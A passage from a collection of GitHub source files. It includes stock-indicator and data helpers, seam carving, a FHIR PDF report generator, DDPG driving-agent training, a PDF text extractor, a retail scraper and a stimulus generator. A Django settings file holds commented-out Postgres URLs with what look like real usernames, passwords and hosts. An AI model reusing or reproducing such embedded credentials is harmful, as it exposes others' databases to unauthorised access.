zeros).unfold(0,window_size,1)\n returns_neg_windows = torch.where(returns < 0, returns, zeros).unfold(0,window_size,1)\n returns_pos_mean = torch_nanmean(returns_pos_windows, dim=-1)\n returns_neg_mean = torch_nanmean(returns_neg_windows, dim=-1)\n RSI = returns_pos_mean / (returns_pos_mean + returns_neg_mean) - 0.5\n RSI = extend(RSI, num_days)\n RSI = torch.clip(RSI, -100, 100)\n RSI = torch.nan_to_num(RSI, nan=0, posinf=0, neginf=0)\n tensor_ret[:,:,3+20+f] = RSI.squeeze()\n\n # Stochastic RSI: https://www.investopedia.com/terms/s/stochrsi.asp\n RSI_windows = RSI.unfold(0,window_size,1)\n RSI_min = extend(torch_nanmin(RSI_windows, dim=-1), num_days)\n RSI_max = extend(torch_nanmax(RSI_windows, dim=-1), num_days)\n SRSI = (RSI - RSI_min) / (RSI_max - RSI_min) - 0.5\n SRSI = torch.nan_to_num(SRSI, nan=0, posinf=0, neginf=0)\n tensor_ret[:,:,3+24+f] = SRSI.squeeze()\n\n # True Strength Index: https://www.investopedia.com/terms/t/tsi.asp\n pc_windows = (close - prev_close).unfold(0,window_size,1)\n price_change = extend(torch_nanmean(pc_windows, dim=-1), num_days)\n price_change_abs = extend(torch_nanmean(torch.abs(pc_windows), dim=-1), num_days)\n TSI = price_change / price_change_abs\n TSI = torch.nan_to_num(TSI, nan=0, posinf=0, neginf=0)\n tensor_ret[:,:,3+28+f] = TSI.squeeze()\n\n # Ultimate Oscillator: https://www.investopedia.com/terms/u/ultimateoscillator.asp\n buying_pressure = close - torch.min(low, prev_close)\n true_high = torch.max(high, prev_close) - torch.min(low, prev_close)\n buying_pressure_windows = buying_pressure.unfold(0,window_size,1)\n true_high_windows = true_high.unfold(0,window_size,1)\n UAV = torch_nansum(buying_pressure_windows, dim=-1) / torch_nansum(true_high_windows, dim=-1) - 0.5\n UAV = torch.nan_to_num(extend(UAV, num_days), nan=0, posinf=0, neginf=0)\n tensor_ret[:,:,3+32+f] = UAV.squeeze()\n\n # Stochastic Oscillator: https://www.investopedia.com/terms/s/stochasticoscillator.asp\n SO = (close - rolling_low_min) / (rolling_high_max - rolling_low_min) - 0.5\n SO = torch.nan_to_num(SO, nan=0, posinf=0, neginf=0)\n tensor_ret[:,:,3+36+f] = SO.squeeze()\n\n tensor_ret[:,:,:3] = torch.nan_to_num(tensor_ret[:,:,:3], nan=0, posinf=0, neginf=0)\n tensor_vol[:,:,:3] = torch.nan_to_num(tensor_vol[:,:,:3], nan=0, posinf=0, neginf=0)\n\n return tensor_ret, tensor_vol\n\n def train_dataloader(self):\n\n return DataLoader(self.train_ds, batch_size=self.batch_size, shuffle=True, drop_last=True)\n\n def val_dataloader(self):\n\n return DataLoader(self.val_ds, batch_size=self.batch_size, shuffle=False, drop_last=True)\n\n def all_dataloader(self):\n\n return DataLoader(self.all_ds, batch_size=100, shuffle=False)\n\n\nclass JpxDataSet(Dataset):\n \n def __init__(self, x, y, w):\n\n super(JpxDataSet, self).__init__()\n\n self.x = x\n self.y = y\n self.w = w\n\n def __len__(self):\n\n return len(self.x)\n\n def __getitem__(self, idx):\n\n return self.x[idx], self.y[idx], self.w[idx]\n\n\n\nif __name__ == '__main__':\n\n data = JPXdataModule()\n\n\n\n\n","repo_name":"codefluence/trading","sub_path":"jpx/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":47294,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"8285963968","text":"from datetime import datetime, timedelta\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nimport numpy as np\nimport requests\nimport time\nimport json\nimport glob\nimport os\nimport re\n\n\ndef github_repo_files(repo_url, ext='.csv'):\n '''\n Get the max date of files in a github repository.\n Parameters:\n repo (url): full repository url containing data files\n ext (str): filename extension to search\n Returns:\n dictionary of valid data urls and the max date \n\n '''\n ext = ext.lower() # make lowercase\n\n regex_url = re.compile(\n r'^(?:http|ftp)s?://' # http:// or https://\n r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\\.)+(?:[A-Z]{2,6}\\.?|[A-Z0-9-]{2,}\\.?)|' #domain...\n r'localhost|' #localhost...\n r'\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})' # ...or ip\n r'(?::\\d+)?' # optional port\n r'(?:/?|[/?]\\S+)$', re.IGNORECASE)\n\n # check if valid url\n if not(re.match(regex_url, repo_url) is None):\n raw_url = repo_url.replace('https://github.com/', 'https://raw.githubusercontent.com/').replace('tree/', '')\n \n # make request\n r = requests.get(repo_url)\n if r.status_code==200:\n soup = BeautifulSoup(r.text, 'html.parser')\n github_data_files = [a.text for a in soup.find_all('a') if ext in a.text]\n if len(github_data_files)>0:\n github_data_urls = [os.path.join(raw_url, f) for f in github_data_files]\n max_file_date = str(max([int(f.split('_')[-1].split('.')[-2]) for f in github_data_files]))\n max_date = (datetime.strptime(max_file_date, '%Y%m%d')).strftime('%Y-%m-%d')\n \n return {'github_data_urls':github_data_urls, 'max_date':max_date}\n \n else:\n raise Exception(f'No files with {ext} in {repo_url}')\n else:\n raise Exception(f'Invalid URL 400 Bad Request: {repo_url}')\n else:\n raise Exception(f'MissingSchema: {repo_url}')\n\n\ndef get_yf_data(list_of_symbols, yf=None, interval='1d', start_date=None, end_date=None, verbose=False, sleep=0):\n '''\n Get stock data using yFinance.\n Parameters:\n yf (obj): yf library\n list_of_symbols (list): list of symbols/tickers\n interval (str): defaults to 1 day, Valid intervals: 1m,2m,5m,15m,30m,60m,90m,1h,1d,5d,1wk,1mo,3mo\n interval (str): default to None, interval selection cutoff\n start_date (str): defaults to None, 'YYYY-MM-DDDD'\n end_date (str): defaults to None, 'YYYY-MM-DDDD'\n verbose (bool): show symbol output\n sleep (int): time between symbol request\n Returns:\n dataframe of entererd symbols\n '''\n\n if type(list_of_symbols)!=list:\n raise Exception(f'Invalid data type for list_of_symbols: {type(list_of_symbols)}')\n\n if yf is None:\n raise Exception(f'yfinance object yf is None, import yfinance as yf')\n\n dfs_list = []\n cnt = 1\n for s in list_of_symbols:\n if verbose:\n print(f'{cnt}/{len(list_of_symbols)} {s}')\n cnt += 1\n ticker = yf.Ticker(s)\n df_ticker = ticker.history(period='max', interval=interval, start=start_date, end=end_date).reset_index()\n df_ticker.insert(1, 'Symbol', s)\n dfs_list.append(df_ticker)\n time.sleep(sleep)\n\n df = pd.concat(dfs_list, sort=False)\n \n return df\n\ndef export_data(df_results, filename, export_path=None):\n '''\n Export results as csv to data folder.\n '''\n # check dates\n min_date = datetime.strftime(df_results['Date'].min(), '%Y%m%d')\n max_date = datetime.strftime(df_results['Date'].max(), '%Y%m%d')\n \n filename_ = f\"{filename}_{min_date}_{max_date}.csv\"\n\n try:\n df_results.to_csv(os.path.join(export_path, filename_), index=False)\n except:\n print(f'Invalid export_path {export_path}, exporting to current directory {os.getcwd()}')\n df_results.to_csv(filename_, index=False)\n\n print(filename_)\n\ndef symbols_dict(create_new=True, path_to_files=None, export_json=True):\n '''\n Create a dictionary object of csv file containing symbol data.\n Parameters:\n create_new (bool): create new dictionary from csv files otherwise, import previous if exist\n path_to_files (str): path with csv symbols, defaults to None\n export_json (bool): export dictionary as .json, defaults to True\n '''\n json_filename = 'symbols.json'\n\n if path_to_files is None:\n raise Exception(f'Invalid path_to_files {path_to_files}')\n\n if create_new:\n dict_ = dict()\n for f in glob.glob(os.path.join(path_to_files, '*csv')):\n filename = os.path.split(f)[-1].split('.')[0]\n dict_[filename] = dict()\n df = pd.read_csv(f)\n for s in df['symbol']:\n dict_[filename][s] = dict()\n for c in df.columns[1:]:\n dict_[filename][s][c] = df[df['symbol']==s][c].values[0]\n\n if export_json:\n with open(os.path.join(path_to_files, json_filename), 'w') as fp:\n json.dump(dict_, fp)\n\n else:\n print(f'Importing previous {json_filename} file')\n if json_filename in os.listdir(path_to_files):\n with open(os.path.join(path_to_files, json_filename)) as fp:\n dict_ = json.load(fp) \n else:\n raise Exception(f'No such file or directory {os.path.join(ASSETS_PATH, json_filename)}')\n\n return dict_","repo_name":"Carmelo94/Stocks","sub_path":"utils/hlpr.py","file_name":"hlpr.py","file_ext":"py","file_size_in_byte":5130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"72310842887","text":"import sys\n\nimport cv2 as cv \nimport numpy as np\nfrom scipy import ndimage \nimport seam_carving as s\nfrom PIL import Image\n\n\ndef loadimage(filename):\n img = cv.imread(cv.samples.findFile(filename))\n #RGB_img = cv.cvtColor(img, cv.COLOR_BGR2RGB)\n return img #RGB_img\n\ndef obj_remove(img , mask_f):\n src = np.array(img)\n mask = mask_f #np.array(Image.open(mask_f).convert('L'))\n new_img = s.remove_object(src, drop_mask=mask, keep_mask=None)\n return new_img\n\ndef energy(img):\n src = np.array(img)\n h, w, c = src.shape\n backward = s.resize(src, (w - 200, h))\n forward = s.resize(src, (w - 200, h), energy_mode='forward')\n return backward , forward\n\nif __name__ == '__main__':\n\n if not len(sys.argv) == 5:\n print(\"Wrong input\")\n exit()\n \n OriginalImg = loadimage(sys.argv[1])\n\n if sys.argv[2] == \"energy\":\n new_im1 , new_im2 = energy(OriginalImg)\n cv.imwrite(sys.argv[3], new_im1)\n cv.imwrite(sys.argv[4], new_im2)\n\n elif sys.argv[2] == \"remove\":\n mask = np.array(Image.open(sys.argv[3]).convert('L'))\n new_im = obj_remove(OriginalImg , mask)\n cv.imwrite(sys.argv[4], new_im)\n else:\n print(\"Check your inputs arguments please\")\n\n \n","repo_name":"Atheeri/Seam-Carving_Computer_Vision","sub_path":"seam_carving_parts_3_and_4.py","file_name":"seam_carving_parts_3_and_4.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"35847798204","text":"__author__ = 'aleksey'\n\nimport os\nimport dj_database_url\n\nDEBUG = True\nTEMPLATE_DEBUG = True\nSQL_DEBUG = True\n\n# location = lambda x: os.path.join(\n# os.path.dirname(os.path.realpath(__file__)), x)\n\n# DATABASES = {'default': dj_database_url.config(default='postgres://homeoptik:kBcwGP@185.58.204.167:5432/homeoptik_db')}\n# Use a Sqlite database by default\n# DATABASES = {'default': dj_database_url.config(default='postgres://kbnzibvwndmgwt:5kFa SFUdgzkGpJrVwZSuVMarim@ec2-54-243-149-147.compute-1.amazonaws.com:5432/dehb58j6jcp7tg')}\n\n# DATABASES['default']['ENGINE'] = 'django.db.backends.postgresql_psycopg2'\n\n# LOG_ROOT = location('logs')\n\n# COMPRESS_ENABLED = False\n\nCACHES = {\n 'default': {\n 'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',\n }\n}","repo_name":"aleksey-zhigulin/homeoptik","sub_path":"homeoptik/settings_local.py","file_name":"settings_local.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"1300526231","text":"from __future__ import print_function\nfrom fpdf import FPDF\nimport sys\nimport json\nimport time\nimport re\n\nclass PDF(FPDF):\n def header(self):\n # Logo\n self.image('fhir.png', 10, 8, 33)\n # Arial bold 15\n self.set_font('Arial', 'IB', 16)\n # Set the color of text \n self.set_text_color(65, 105, 225)\n # Move to the right\n self.cell(70)\n # Title\n self.cell(30, 8, 'Observation Report', 0, 0, 'C')\n # Current time of generated file\n self.cell(50)\n localtime = time.asctime(time.localtime(time.time()))\n currentTime = localtime\n self.cell(30,8,currentTime,0,2,'C')\n # Line break\n self.ln(10)\n\n # Page footer\n def footer(self):\n # Position at 1.5 cm from bottom\n self.set_y(-15)\n # Arial italic 8\n self.set_font('Arial', 'IB', 8)\n # Text color in gray\n self.set_text_color(65, 105, 225)\n # Page number\n self.cell(0, 10, 'Page ' + str(self.page_no()), 0, 0, 'C')\n\nif __name__ == '__main__':\n i = \"\"\n pdf = PDF()\n pdf.alias_nb_pages()\n pdf.add_page()\n pdf.set_font('Arial','',10)\n\n time.sleep(2)\n\n print(\"Get the stdin data\")\n l = sys.stdin.readlines()\n print(type(l))\n for k in l:\n i = i + k\n # string -> json dictionary\n param_json = json.loads(i)\n\n def getID():\n if 'id' in param_json:\n return param_json['id']\n \n def getDateTime():\n if 'effectiveDateTime' in param_json:\n return param_json['effectiveDateTime']\n else:\n return ''\n\n def getIssued():\n if 'issued' in param_json:\n return param_json['issued']\n else:\n return ''\n\n def getCode():\n if 'code' in param_json:\n code = param_json['code']\n if 'text' in code:\n return code['text']\n else:\n return ''\n else:\n return ''\n \n def getValue():\n result = ''\n value = ''\n unit = ''\n if 'valueQuantity' in param_json:\n quantity = param_json['valueQuantity']\n if 'value' in quantity:\n value = quantity['value']\n if 'unit' in quantity:\n unit = quantity['unit']\n result = str(value) + ' ' + unit\n return result\n else:\n return result\n \n def getUpdate():\n if 'meta' in param_json:\n meta = param_json['meta']\n if 'lastUpdated' in meta:\n return meta['lastUpdated']\n else:\n return ''\n else:\n return ''\n \n def getVersion():\n if 'meta' in param_json:\n meta = param_json['meta']\n if 'versionId' in meta:\n return str(meta['versionId'])\n else:\n return ''\n else:\n return ''\n \n def getReference():\n if 'subject' in param_json:\n subject = param_json['subject']\n if 'reference' in subject:\n return subject['reference']\n else:\n return ''\n else:\n return ''\n \n def drawObservation():\n pdf.set_font('Arial','B',10)\n pdf.set_text_color(65, 105, 225)\n pdf.cell(30,8,getCode()+': '+getValue(),0,0,'L')\n \n def setDefault():\n pdf.set_font('Arial','',10)\n pdf.set_text_color(0,0,0)\n \n def pageContent():\n pdf.set_font('Arial','B',10)\n pdf.cell(30, 8, 'Last updated:', 0, 0, 'L')\n setDefault()\n pdf.cell(5)\n pdf.cell(30, 8, getUpdate(), 0, 1, 'L')\n\n pdf.set_font('Arial','B',10)\n pdf.cell(30, 8, 'Report version:', 0, 0, 'L')\n setDefault()\n pdf.cell(5)\n pdf.cell(30, 8, getVersion(), 0, 1, 'L')\n\n pdf.set_font('Arial','B',10)\n pdf.cell(30, 8, 'Observation ID:', 0, 0, 'L')\n setDefault()\n pdf.cell(5)\n pdf.cell(30, 8, getID(), 0, 1, 'L')\n\n pdf.set_font('Arial','B',10)\n pdf.cell(30, 8, 'Reference ID:', 0, 0, 'L')\n setDefault()\n pdf.cell(5)\n pdf.cell(30, 8, getReference(), 0, 1, 'L')\n\n pdf.set_font('Arial','B',10)\n pdf.cell(30, 8, 'Date Time:', 0, 0, 'L')\n setDefault()\n pdf.cell(5)\n pdf.cell(30, 8, getDateTime(), 0, 1, 'L')\n\n pdf.set_font('Arial','B',10)\n pdf.cell(30, 8, 'Issued Time:', 0, 0, 'L')\n setDefault()\n pdf.cell(5)\n pdf.cell(30, 8, getIssued(), 0, 1, 'L')\n\n drawObservation()\n setDefault()\n pdf.cell(50)\n \n pageContent()\n print('Observation File Generation complete!')\n pdf.output(\"observation.pdf\",'F')","repo_name":"yifanzhang13/GOSH-FHIRworks2020-PDFer","sub_path":"dotnet-azure-fhir-web-api/observation.py","file_name":"observation.py","file_ext":"py","file_size_in_byte":4765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"21280859190","text":"#!/usr/bin/env python3\nimport glob\nimport os\nimport random\nimport sys\n\nimport numpy as np\nimport torch\nfrom tqdm import tqdm\nimport datetime\nfrom Env import CarEnv\nfrom Agent.DDPG import DDPGAgent\nfrom Utils.Util import abstract_data_numpy\nfrom config import ddpg_setting\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\ntry:\n sys.path.append(glob.glob('E:/carla/CARLA_0.9.11/WindowsNoEditor/PythonAPI/carla/dist/carla-*%d.%d-%s.egg' % (\n sys.version_info.major,\n sys.version_info.minor,\n 'win-amd64' if os.name == 'nt' else 'linux-x86_64'))[0])\nexcept IndexError:\n pass\n\n\nEPISODES = ddpg_setting.EPISODES\nINTERVAL_NUM = ddpg_setting.INTERVAL_NUM\nWIDTH = ddpg_setting.WIDTH\nHEIGHT = ddpg_setting.HEIGHT\n\nSIGMA_DECAY = ddpg_setting.SIGMA_DECAY\nMIN_SIGMA = ddpg_setting.MIN_SIGMA\ndef train_ddpg(episodes=EPISODES,\n interval_num=INTERVAL_NUM,\n abstract_train=False,\n txtname=\"ddpg_train\",\n start_location=\"default\",\n sigma=ddpg_setting.SIGMA):\n random.seed(1)\n np.random.seed(2)\n\n # 删除历史训练记录\n if os.path.exists(txtname):\n os.remove(txtname)\n\n # 创建权重保存文件夹\n dt = datetime.datetime.now()\n save_path = \"./trained_model/save\" + \"%s-%s-%s-%s-%s-%s\" % (dt.year, dt.month, dt.day, dt.hour, dt.minute, dt.second)\n os.makedirs(save_path)\n\n agent = DDPGAgent()\n env = CarEnv(im_width=WIDTH, im_height=HEIGHT, startlocation=start_location, action_type=\"continuous\", reward_type=ddpg_setting.reward_type)\n\n for episode in tqdm(range(1, episodes + 1), unit='episodes'):\n episode_reward = 0.0 # 当前轮次的累计reward\n current_state = env.reset() # 像素在0-255之间\n current_state = current_state.astype(np.float32) / 255\n if abstract_train:\n current_state = abstract_data_numpy(current_state,interval_num=interval_num) # (channel, 2 * height, width)\n # 将(height, width, channel)转换为(channel, height, width)\n current_state = current_state.transpose((2, 0, 1))\n\n while True:\n action = agent.get_next_action(current_state, sigma=sigma, disturbance=True)\n # print(\"action\", action)\n new_state, reward, done, _ = env.step(action)\n new_state = new_state.astype(np.float32) / 255\n if abstract_train:\n new_state = abstract_data_numpy(new_state, interval_num=interval_num)\n new_state = new_state.transpose((2, 0, 1))\n episode_reward += reward\n # if reward >= -0.99 or done is True: # 车静止时返回-1并且done=false,静止时不计入经验\n agent.update_replay_memory((current_state, action, reward, new_state, done))\n current_state = new_state\n if done:\n print(\"episode %d, episode_reward %f, sigma %f\" % (episode, episode_reward, sigma))\n break\n\n with open(txtname, 'a') as f:\n f.write(\"episode %d, episode_reward %f, sigma %f\\n\" % (episode, episode_reward, sigma))\n\n agent.train_in_loop(train_time=ddpg_setting.TRAIN_TIME)\n # 每100次保存权重\n if episode % 50 == 0:\n torch.save(obj=agent.model_action.state_dict(),\n f=save_path + \"/ddpg_action_\" + \"%depoch.pth\" % (episode,))\n torch.save(obj=agent.model_value.state_dict(),\n f=save_path + \"/ddpg_value_\" + \"%depoch.pth\" % (episode,))\n\n sigma = max(MIN_SIGMA, sigma * SIGMA_DECAY)\n\nif __name__ == '__main__':\n train_ddpg(abstract_train=True,\n txtname=\"ddpg_train_pointdefault2_abstract.txt\",\n start_location=\"default2\")\n\n\n\n","repo_name":"DajiaLi/my_torch_carla","sub_path":"ddpg_train.py","file_name":"ddpg_train.py","file_ext":"py","file_size_in_byte":3741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"17766742719","text":"import this\nfrom aws_cdk import (\n # Duration,\n Stack,\n \n Duration,\n RemovalPolicy,\n Stack,\n CfnOutput,\n aws_cloudformation as cfn,\n aws_ec2 as ec2,\n aws_ssm as ssm,\n aws_kms as kms,\n aws_backup as backup,\n aws_events as events,\n aws_iam as iam\n \n # aws_sqs as sqs,\n)\nfrom constructs import Construct\nfrom aws_cdk import NestedStack\nimport aws_cdk as cdk\nfrom cdk_ec2_key_pair import KeyPair\n \nclass mgmtserver(cdk.NestedStack):\n\n def __init__(self, scope: Construct, construct_id: str,vpc2:ec2.Vpc, **kwargs) -> None:\n super().__init__(scope, construct_id, **kwargs)\n ##### Parameters ##########\n myenvironment=self.node.try_get_context(\"myenvironment\")\n SecurityGp=myenvironment.get(\"SecurityGp\")\n mgsg_id=SecurityGp.get(\"mgsg_id\")\n mgsg_name=SecurityGp.get(\"mgsg_name\")\n mgsg_peer= SecurityGp.get(\"mgsg_peer\")\n ### AMI ####\n amzn_windows = ec2.MachineImage.latest_windows(\n ec2.WindowsVersion.WINDOWS_SERVER_2019_ENGLISH_FULL_BASE\n )\n ### Role ####\n role1= iam.Role(self,\"keyrole1\",\n assumed_by=iam.ServicePrincipal(\"ec2.amazonaws.com\"),\n )\n role1.add_managed_policy(\n iam.ManagedPolicy.from_aws_managed_policy_name\n (\"AmazonSSMManagedInstanceCore\")\n )\n ###add this role AmazonS3ReadOnlyAccess\n self.MgmtSG=ec2.SecurityGroup(self,mgsg_id,\n vpc= vpc2,\n description=\"MgmtSecurityGp\",\n allow_all_outbound=True,\n security_group_name=mgsg_name)\n self.MgmtSG.add_ingress_rule(ec2.Peer.ipv4(mgsg_peer),\n ec2.Port.tcp(22),\n \"SSH Connecton\")\n self.MgmtSG.add_ingress_rule(ec2.Peer.ipv4(mgsg_peer),\n ec2.Port.tcp(3389),\n \"SSH Connecton\")\n self.MgmtSG.add_ingress_rule(ec2.Peer.ipv4(mgsg_peer),\n ec2.Port.tcp(80),\n \"HTTP\")\n self.MgmtSG.add_ingress_rule(ec2.Peer.ipv4(mgsg_peer),\n ec2.Port.tcp(443),\n \"HTTPS\")\n\n ### Key Pair for mgmt server ####\n\n key1 = KeyPair(self,\"KeyPair2\",\n name=\"MgmtServerKey\",\n store_public_key=True,\n resource_prefix=\"K\"\n )\n \n key1.grant_read_on_private_key(role1)\n key1.grant_read_on_public_key(role1)\n\n ######## Launch Management server( EC2 Instance ) ########\n \n self.instance2 = ec2.Instance(self, \"mgmtServer\",\n instance_type=ec2.InstanceType(\"t2.micro\"),\n machine_image=amzn_windows,\n vpc = vpc2,\n block_devices= [ec2.BlockDevice(\n device_name=\"/dev/sda1\", \n volume=ec2.BlockDeviceVolume.ebs(\n volume_size= 30,\n # volume_type=ec2.EbsDeviceVolumeType.GP2,\n encrypted=True\n ),\n # mapping_enabled= True\n )],\n \n role=role1,\n security_group = self.MgmtSG,\n key_name=key1.key_pair_name\n )\n","repo_name":"techgrounds/cloud-6-repo-rupaliBC","sub_path":"projectFinal/project_final/MgmtServer.py","file_name":"MgmtServer.py","file_ext":"py","file_size_in_byte":3730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"29875384792","text":"import argparse\nimport logging\nimport os\n\nimport pdfplumber\n\n\ndef convert_file(source, dest=None, **kwargs):\n if not dest:\n dest = source.replace(\".pdf\", \".txt\")\n\n logging.info(\"Converting {} to {}\".format(source, dest))\n with pdfplumber.open(source) as pdf, open(dest, \"w\", encoding=\"utf8\") as destfile:\n text = \"\\n----\\n\".join(\n [p.extract_text() for p in pdf.pages if p.extract_text()]\n )\n destfile.write(text)\n\n\ndef convert_folder(source, **kwargs):\n for f in os.listdir():\n if f.endswith(\".pdf\"):\n convert_file(f)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n description=\"\"\"Extract text from a PDF to a text file\"\"\"\n )\n parser.add_argument(\n \"-v\", \"--verbose\", action=\"store_true\", help=\"More descriptive output\"\n )\n\n subparsers = parser.add_subparsers(help=\"Operation to perform\")\n\n folder_parser = subparsers.add_parser(\n \"folder\", help=\"Convert all PDF files in a folder to txt\"\n )\n folder_parser.add_argument(\n \"--source\", default=\".\", help=\"Folder in which to look for PDFs\"\n )\n folder_parser.set_defaults(func=convert_folder)\n\n file_parser = subparsers.add_parser(\"file\", help=\"Convert a PDF file to TXT\")\n file_parser.add_argument(\"source\", help=\"PDF file to convert\")\n file_parser.add_argument(\"--dest\", default=None, help=\"destination file\")\n file_parser.set_defaults(func=convert_file)\n\n args = parser.parse_args()\n\n if args.verbose:\n logging.basicConfig(level=logging.DEBUG)\n\n args.func(**args.__dict__)\n","repo_name":"drkane/charity-account-fetch","sub_path":"extract_text.py","file_name":"extract_text.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"36467192321","text":"# -*- coding:utf-8 -*-\nfrom . import JaySpider\nfrom ..items.areatrend_item import AreatrendItem\nfrom ..utils import CustomLoader, enrich_wrapper, extract_specs\n\n\nclass AreatrendSpider(JaySpider):\n name = \"areatrend\"\n item_xpath = ('//div[@class=\"product-item-info\"]/div/a/@href',)\n page_xpath = (r'(.*?)(p=1)(\\d+)(.*)',)\n\n custom_settings = {\n \"ITEM_PIPELINES\": {\n 'crawling.pipelines.%s_pipeline.%sKafkaPipeline' % (name, name.capitalize()): None if JaySpider.debug else 100,\n 'crawling.pipelines.%s_pipeline.%sFilePipeline' % (name, name.capitalize()): 100 if JaySpider.debug else None,\n },\n \"SPIDER_MIDDLEWARES\": {\n 'scrapy.contrib.spidermiddleware.depth.DepthMiddleware': None,\n 'crawling.spidermiddlewares.InfluxDBMiddleware': 990,\n 'crawling.spidermiddlewares.AreatrendMiddleware': 991,\n }\n }\n\n @staticmethod\n def get_base_loader(response):\n return CustomLoader(item=AreatrendItem())\n\n @enrich_wrapper\n def enrich_data(self, item_loader, response):\n self.logger.debug(\"Start to enrich data. \")\n item_loader.add_xpath(\"product_id\", '//div[@class=\"product attribute sku\"]/div[@class=\"value\"]/text()')\n item_loader.add_xpath(\"model_number\", '//td[@data-th=\"Style\"]/text()')\n item_loader.add_xpath(\"part_number\", '//td[@data-th=\"Style\"]/text()')\n item_loader.add_xpath(\"mpn\", '//td[@data-th=\"Style\"]/text()')\n item_loader.add_xpath(\"title\", '//h1[@class=\"page-title\"]/span/text()')\n item_loader.add_re(\"skus\", r'\"jsonConfig\": ({.+}),')\n item_loader.add_xpath(\"old_price\", ['//span[@class=\"old-price\"]//span[@class=\"price\"]/text()',\n '//div[@class=\"product-info-price\"]//span[@class=\"price\"]/text()'])\n item_loader.add_xpath(\"special_price\", '//span[@class=\"special-price\"]//span[@class=\"price\"]/text()')\n item_loader.add_re(\"color_size\", r'\"jsonSwatchConfig\": ({.+}),')\n item_loader.add_xpath(\"features\", '//div[@class=\"value\"]/ul/li/text()')\n item_loader.add_re(\"color_images\", r'\"data\": (\\[[\\S\\s]+?\\]),')\n item_loader.add_xpath(\"description\", '//div[@class=\"product attribute description\"]/div/text()')\n item_loader.add_xpath(\"detail\", '//div[@id=\"additional\"]')\n item_loader.add_value(\"specs\", extract_specs(response.selector, '//table[@id=\"product-attribute-specs-table\"]//tr'))\n item_loader.add_value(\"availability\", True)\n\n def need_duplicate(self, url):\n return url","repo_name":"ShichaoMa/old-spider","sub_path":"jay-scraper/crawling/spiders/areatrend_spider.py","file_name":"areatrend_spider.py","file_ext":"py","file_size_in_byte":2556,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"30093514303","text":"class Solution:\n def maxAreaOfIsland(self, grid: List[List[int]]) -> int:\n if not grid:\n return 0\n rows = len(grid)\n cols = len(grid[0])\n\n def dfs(r, c):\n if (min(r, c) < 0) or (r >= rows or c >= cols) or (grid[r][c] == 0):\n return 0\n grid[r][c] = 0 #\n d = dfs(r+1, c) \n u = dfs(r-1, c)\n right = dfs(r, c+1)\n l = dfs(r, c-1)\n return d + u + right + l + 1 #include current cell, which is 1\n\n area = 0\n for r in range(rows):\n for c in range(cols):\n #if current cell is part of island, \n #perform DFS & update area if it's larger than current max\n area = max(area, dfs(r, c)) \n return area\n\n\n","repo_name":"mandyliou/leetcode","sub_path":"max-area-of-island/max-area-of-island.py","file_name":"max-area-of-island.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"7042777959","text":"from collections import Counter\nimport itertools\nimport logging\nimport re\nfrom typing import Callable, List, NamedTuple, Tuple, Optional, Dict\n\nimport numpy as np\nimport torch.distributions as dist\nimport torch\nfrom torch.nn.functional import pad\nfrom torchtyping import TensorType\nimport transformers\nfrom transformers import AutoModelForCausalLM, AutoTokenizer # type: ignore\nfrom transformers.tokenization_utils_base import BatchEncoding\nfrom tqdm.auto import tqdm, trange\n\nfrom berp.datasets.processor import NaturalLanguageStimulusProcessor\nfrom berp.typing import DIMS, is_probability, is_log_probability\n\n\nL = logging.getLogger(__name__)\n\n# Type variables\nB, N_W, N_C, N_F, N_P, V_W = DIMS.B, DIMS.N_W, DIMS.N_C, DIMS.N_F, DIMS.N_P, DIMS.V_W\nT, S = DIMS.T, DIMS.S\n\n\nclass Stimulus(NamedTuple):\n\n word_lengths: TensorType[N_W, torch.int]\n phoneme_onsets: TensorType[N_W, N_P, torch.float]\n phoneme_onsets_global: TensorType[N_W, N_P, torch.float]\n word_onsets: TensorType[N_W, torch.float]\n word_offsets: TensorType[N_W, torch.float]\n word_surprisals: TensorType[N_W, torch.float]\n p_candidates: TensorType[N_W, N_C, torch.float, is_log_probability]\n candidate_phonemes: TensorType[N_W, N_C, N_P, torch.long]\n\n\ndef align_to_sample_rate(times, sample_rate):\n \"\"\"\n Adjust the time series so that each event happens aligned to the left edge of\n a sample, assuming the given sample rate.\n \"\"\"\n return torch.round(times * sample_rate) / sample_rate\n\n\nclass StimulusGenerator(object):\n\n def __init__(self,\n phon_delay_range: Tuple[float, float] = (0.08, 0.2),\n word_delay_range: Tuple[float, float] = (0.1, 0.4)):\n self.phon_delay_range = phon_delay_range\n self.word_delay_range = word_delay_range\n\n self.first_onset = 1.0 # TODO magic to make epoching not break\n\n def __call__(self, *args, **kwargs) -> Stimulus:\n raise NotImplementedError()\n\n def sample_stream(self, word_lengths: TensorType[N_W, int],\n max_num_phonemes: int,\n align_sample_rate: Optional[int] = None,\n ) -> Tuple[TensorType[N_W, N_P, float],\n TensorType[N_W, N_P, float],\n TensorType[N_W, float],\n TensorType[N_W, float]]:\n num_words = len(word_lengths)\n\n phoneme_durations = rand_unif(*self.phon_delay_range, num_words, max_num_phonemes)\n phoneme_durations[torch.arange(max_num_phonemes) >= word_lengths.unsqueeze(1)] = 